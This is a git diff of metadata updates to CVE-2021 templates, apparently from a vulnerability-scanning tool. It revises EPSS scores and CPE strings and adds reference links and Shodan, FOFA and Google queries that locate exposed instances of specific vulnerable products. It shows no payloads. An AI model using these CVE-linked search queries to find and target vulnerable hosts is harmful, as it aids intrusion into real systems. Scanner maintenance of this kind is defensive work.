metadata: max-request: 2 vendor: eclipse product: jetty + shodan-query: cpe:"cpe:2.3:a:eclipse:jetty" tags: cve2021,cve,packetstorm,vulhub,jetty,exposure,eclipse flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index 3ccf2f9491..09e96598cf 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -21,13 +21,14 @@ info: cvss-score: 5.3 cve-id: CVE-2021-28169 cwe-id: CWE-200,NVD-CWE-Other - epss-score: 0.00401 - epss-percentile: 0.70865 + epss-score: 0.00618 + epss-percentile: 0.78767 cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: eclipse product: jetty + shodan-query: cpe:"cpe:2.3:a:eclipse:jetty" tags: cve2021,cve,jetty,eclipse http: diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 1959824f21..8172d8b0d2 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-28377 cwe-id: CWE-22 epss-score: 0.00106 - epss-percentile: 0.42913 + epss-percentile: 0.43237 cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index 7ff682344f..da5eb9f715 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-28419 cwe-id: CWE-89 - epss-score: 0.17236 - epss-percentile: 0.95637 + epss-score: 0.15235 + epss-percentile: 0.95839 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index c6825729e2..ee497a4678 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -13,18 +13,20 @@ info: - https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990 - http://acexy.com - https://nvd.nist.gov/vuln/detail/CVE-2021-28937 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-28937 cwe-id: CWE-312 - epss-score: 0.02476 - epss-percentile: 0.88958 - cpe: cpe:2.3:o:acexy:wireless-n_wifi_repeater_firmware:28.08.06.1:*:*:*:*:*:*:* + epss-score: 0.03261 + epss-percentile: 0.91257 + cpe: cpe:2.3:h:acexy:wireless-n_wifi_repeater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: acexy - product: wireless-n_wifi_repeater_firmware + product: wireless-n_wifi_repeater tags: cve2021,cve,acexy,disclosure,iot http: diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index dee3572992..8222f07071 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -24,6 +24,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2021,cve,rconfig,authenticated,lfi http: diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index 381fbbf5d6..ff16725ea6 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -19,14 +19,16 @@ info: cvss-score: 7.5 cve-id: CVE-2021-29156 cwe-id: CWE-74 - epss-score: 0.30859 - epss-percentile: 0.96857 + epss-score: 0.29536 + epss-percentile: 0.96913 cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: forgerock product: openam shodan-query: http.title:"OpenAM" + fofa-query: title="openam" + google-query: intitle:"openam" tags: cve2021,cve,openam,ldap,injection,forgerock http: diff --git a/http/cves/2021/CVE-2021-29200.yaml b/http/cves/2021/CVE-2021-29200.yaml index 3c02de645f..0ce1ba2632 100644 --- a/http/cves/2021/CVE-2021-29200.yaml +++ b/http/cves/2021/CVE-2021-29200.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-29200 cwe-id: CWE-502 - epss-score: 0.90403 - epss-percentile: 0.98567 + epss-score: 0.85578 + epss-percentile: 0.9855 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index b18961aec3..06e5f885b0 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-29203 cwe-id: CWE-306 - epss-score: 0.95519 - epss-percentile: 0.99258 + epss-score: 0.95563 + epss-percentile: 0.99393 cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index a1e8009c16..42e5b76170 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-29442 cwe-id: CWE-306 - epss-score: 0.9676 - epss-percentile: 0.99596 + epss-score: 0.96724 + epss-percentile: 0.99657 cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index 31fdd85c80..78ac537567 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -27,6 +27,7 @@ info: vendor: ghost product: ghost framework: node.js + shodan-query: http.component:"ghost" tags: cve2021,cve,xss,ghost,node.js http: diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index a5de338f9d..e47de0ddcf 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-29490 cwe-id: CWE-918 epss-score: 0.00159 - epss-percentile: 0.51433 + epss-percentile: 0.52336 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: jellyfin product: jellyfin shodan-query: http.title:"Jellyfin" + fofa-query: body="jellyfin" + google-query: intitle:"jellyfin" tags: cve,cve2021,ssrf,jellyfin,oast http: diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index 97e6c6a595..a49b3e4c07 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -13,13 +13,14 @@ info: - https://github.com/prometheus/prometheus/releases/tag/v2.26.1 - https://github.com/prometheus/prometheus/releases/tag/v2.27.1 - https://nvd.nist.gov/vuln/detail/CVE-2021-29622 + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-29622 cwe-id: CWE-601 - epss-score: 0.00269 - epss-percentile: 0.64358 + epss-score: 0.00287 + epss-percentile: 0.68762 cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 1f9d7e12c6..4f9477742d 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -26,6 +26,10 @@ info: max-request: 1 vendor: adminer product: adminer + shodan-query: http.title:"login - adminer" + fofa-query: app="adminer" && body="4.7.8" + hunter-query: app.name="adminer"&&web.body="4.7.8" + google-query: intitle:"login - adminer" tags: cve2021,cve,adminer,xss http: diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 0be734c0ee..a4285656cd 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-3002 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.49273 + epss-percentile: 0.50121 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index 8e5102506d..b45286451f 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -19,13 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2021-30049 cwe-id: CWE-79 - epss-score: 0.00106 - epss-percentile: 0.42156 + epss-score: 0.00113 + epss-percentile: 0.44743 cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:* metadata: max-request: 1 vendor: sysaid product: sysaid + shodan-query: http.favicon.hash:1540720428 + fofa-query: icon_hash=1540720428 tags: cve2021,cve,xss,sysaid http: diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index 0b586a7349..5c6d5420f0 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-30128 cwe-id: CWE-502 - epss-score: 0.62199 - epss-percentile: 0.97748 + epss-score: 0.59411 + epss-percentile: 0.97756 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: apache product: ofbiz fofa-query: app="Apache_OFBiz" + shodan-query: http.html:"ofbiz" tags: cve2021,cve,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index 73e42c7040..53bf9ec457 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -13,13 +13,14 @@ info: reference: - https://wpscan.com/vulnerability/0b547728-27d2-402e-ae17-90d539344ec7 - https://nvd.nist.gov/vuln/detail/CVE-2021-30134 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-30134 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40139 + epss-score: 0.00099 + epss-percentile: 0.41025 cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index 8c81b5b939..53a4722127 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -20,14 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2021-30151 cwe-id: CWE-79 - epss-score: 0.00574 - epss-percentile: 0.77475 + epss-score: 0.00812 + epss-percentile: 0.81748 cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: contribsys product: sidekiq shodan-query: title:"Sidekiq" + fofa-query: title="sidekiq" + google-query: intitle:"sidekiq" tags: cve2021,cve,xss,sidekiq,authenticated,contribsys http: diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index ec903a4255..fdd9c980ba 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -19,13 +19,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-3017 - epss-score: 0.01527 - epss-percentile: 0.86768 - cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:* + epss-score: 0.01563 + epss-percentile: 0.87211 + cpe: cpe:2.3:h:intelbras:win_300:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelbras - product: win_300_firmware + product: win_300 tags: cve2021,cve,exposure,router,intelbras http: diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index 245a4f438a..e6ee2c214a 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -20,13 +20,14 @@ info: cvss-score: 9.8 cve-id: CVE-2021-30175 cwe-id: CWE-89 - epss-score: 0.05126 - epss-percentile: 0.92775 + epss-score: 0.06252 + epss-percentile: 0.93587 cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zerof product: web_server + shodan-query: cpe:"cpe:2.3:a:google:web_server" tags: cve2021,cve,zerof,sqli http: diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index 81cd4fd3aa..be2feaac93 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-3019 cwe-id: CWE-22 - epss-score: 0.00832 - epss-percentile: 0.81646 + epss-score: 0.01119 + epss-percentile: 0.84553 cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index c7db2df945..d3bee5e1a9 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-30213 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42145 + epss-percentile: 0.43249 cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index 19911e5244..4c0742aa5f 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -14,19 +14,23 @@ info: - https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ - https://nvd.nist.gov/vuln/detail/CVE-2021-30461 - https://ssd-disclosure.com/ssd-advisory--voipmonitor-unauth-rce + - https://github.com/ARPSyndicate/cvemon + - https://github.com/openx-org/BLEN classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-30461 cwe-id: CWE-94 - epss-score: 0.96262 - epss-percentile: 0.99416 + epss-score: 0.95518 + epss-percentile: 0.99386 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: voipmonitor product: voipmonitor shodan-query: http.title:"VoIPmonitor" + fofa-query: title="voipmonitor" + google-query: intitle:"voipmonitor" tags: cve2021,cve,rce,voipmonitor http: diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index 5694461ec9..629ef8ce82 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-30497 cwe-id: CWE-22 - epss-score: 0.95284 - epss-percentile: 0.99297 + epss-score: 0.95082 + epss-percentile: 0.99313 cpe: cpe:2.3:a:ivanti:avalanche:6.3.2:*:*:*:*:windows:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index ca1e66df46..50ed6d0a55 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -22,13 +22,14 @@ info: cve-id: CVE-2021-3110 cwe-id: CWE-89 epss-score: 0.83896 - epss-percentile: 0.98387 + epss-percentile: 0.98474 cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: prestashop product: prestashop + shodan-query: cpe:"cpe:2.3:a:prestashop:prestashop" tags: cve,cve2021,sqli,prestshop,edb,prestashop http: diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index 6c895b086f..6e19ed1bad 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -28,6 +28,8 @@ info: vendor: microsoft product: exchange_server shodan-query: http.title:"Outlook" + fofa-query: title="outlook" + google-query: intitle:"outlook" tags: cve2021,cve,microsoft,exchange,owa,xss http: diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index d41300c112..601045c4e4 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2021-31250 cwe-id: CWE-79 - epss-score: 0.97079 - epss-percentile: 0.99728 + epss-score: 0.97029 + epss-percentile: 0.9975 cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index d124b4b33a..e4529cfda9 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-31537 cwe-id: CWE-79 epss-score: 0.00355 - epss-percentile: 0.71454 + epss-percentile: 0.71969 cpe: cpe:2.3:a:sisinformatik:sis-rewe_go:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index 8deb6bf7e7..381f4d02f1 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -12,13 +12,15 @@ info: - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/ - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ - https://nvd.nist.gov/vuln/detail/CVE-2021-31581 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.4 cve-id: CVE-2021-31581 - cwe-id: CWE-312,CWE-269 - epss-score: 0.00285 - epss-percentile: 0.65373 + cwe-id: CWE-269,CWE-312 + epss-score: 0.00213 + epss-percentile: 0.59248 cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index 1e4a75e5bd..a406109b52 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-31589 cwe-id: CWE-79 epss-score: 0.00286 - epss-percentile: 0.65537 + epss-percentile: 0.68716 cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index e17f57dc74..ae92682338 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-31602 cwe-id: CWE-287 - epss-score: 0.36115 - epss-percentile: 0.97042 + epss-score: 0.25923 + epss-percentile: 0.9671 cpe: cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 29bc75f70b..571c3ad736 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -20,14 +20,15 @@ info: cvss-score: 6.1 cve-id: CVE-2021-31682 cwe-id: CWE-79 - epss-score: 0.01492 - epss-percentile: 0.86569 + epss-score: 0.0116 + epss-percentile: 0.84847 cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: automatedlogic product: webctrl shodan-query: html:"/_common/lvl5/dologin.jsp" + fofa-query: body="/_common/lvl5/dologin.jsp" tags: cve2021,cve,webctrl,xss,packetstorm,automatedlogic http: diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index 0ead178809..e14aefe39e 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-31755 cwe-id: CWE-787 - epss-score: 0.96978 - epss-percentile: 0.99717 + epss-score: 0.97104 + epss-percentile: 0.99781 cpe: cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 30f2975f4c..f1ee5ac188 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2021,cve,apache,rce,struts,struts2,intrusive http: diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index 805fc25458..c45ee5267b 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: sysaid product: sysaid + shodan-query: http.favicon.hash:1540720428 + fofa-query: icon_hash=1540720428 tags: cve2021,cve,xss,sysaid http: diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index 15ec1ab636..35519a7591 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -31,6 +31,7 @@ info: framework: node.js shodan-query: title:"Node-RED" fofa-query: title="Node-RED" + google-query: intitle:"node-red" tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js http: diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index aad17cfa4e..804f0a137b 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-32618 cwe-id: CWE-601 epss-score: 0.00113 - epss-percentile: 0.43765 + epss-percentile: 0.44665 cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 14579e4856..34558cc2fc 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.6 cve-id: CVE-2021-32820 cwe-id: CWE-94,CWE-200 - epss-score: 0.01304 - epss-percentile: 0.85598 + epss-score: 0.01756 + epss-percentile: 0.8795 cpe: cpe:2.3:a:express_handlebars_project:express_handlebars:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index 5c5fd48f84..b74c2d40bb 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -27,6 +27,8 @@ info: vendor: erxes product: erxes shodan-query: http.title:"erxes" + fofa-query: title="erxes" + google-query: intitle:"erxes" tags: cve2021,cve,xss,erxes,oss http: diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index 6c6d012ae4..d546ad9d09 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.8 cve-id: CVE-2021-3297 cwe-id: CWE-287 - epss-score: 0.1939 - epss-percentile: 0.96173 + epss-score: 0.26301 + epss-percentile: 0.96731 cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index 169ea1437a..9ec63b51e9 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://seclists.org/fulldisclosure/2021/Oct/13 - https://www.dahuasecurity.com/support/cybersecurity/details/957 + - https://github.com/bp2008/DahuaLoginBypass classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-33044 cwe-id: CWE-287 - epss-score: 0.29051 - epss-percentile: 0.96446 + epss-score: 0.30359 + epss-percentile: 0.96948 cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index d4f23cae61..788be4ab37 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33221 cwe-id: CWE-306 - epss-score: 0.23566 - epss-percentile: 0.96154 + epss-score: 0.20879 + epss-percentile: 0.96393 cpe: cpe:2.3:a:commscope:ruckus_iot_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index 504f99f93b..e0d84db1c9 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -21,13 +21,15 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33357 cwe-id: CWE-78 - epss-score: 0.96502 - epss-percentile: 0.99569 + epss-score: 0.96707 + epss-percentile: 0.99648 cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: raspap product: raspap + shodan-query: http.favicon.hash:-1465760059 + fofa-query: icon_hash=-1465760059 tags: cve2021,cve,rce,raspap,oast http: diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index ab06b3d302..a1e772d026 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -27,6 +27,7 @@ info: vendor: sap product: netweaver_development_infrastructure shodan-query: html:"SAP NetWeaver" + fofa-query: body="sap netweaver" tags: cve2021,cve,oast,ssrf,sap http: diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index 0aac62c649..3180a8af63 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -13,13 +13,15 @@ info: - https://github.com/colemanjp/shinyserver-directory-traversal-source-code-leak - https://blog.rstudio.com/2021/01/13/shiny-server-1-5-16-update/ - https://nvd.nist.gov/vuln/detail/CVE-2021-3374 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-3374 cwe-id: CWE-22 epss-score: 0.00235 - epss-percentile: 0.61534 + epss-percentile: 0.61494 cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index e4d7af1171..75ef34cecf 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-3377 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.46774 + epss-percentile: 0.47703 cpe: cpe:2.3:a:ansi_up_project:ansi_up:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index 26f2117ef5..1254618934 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -20,8 +20,8 @@ info: 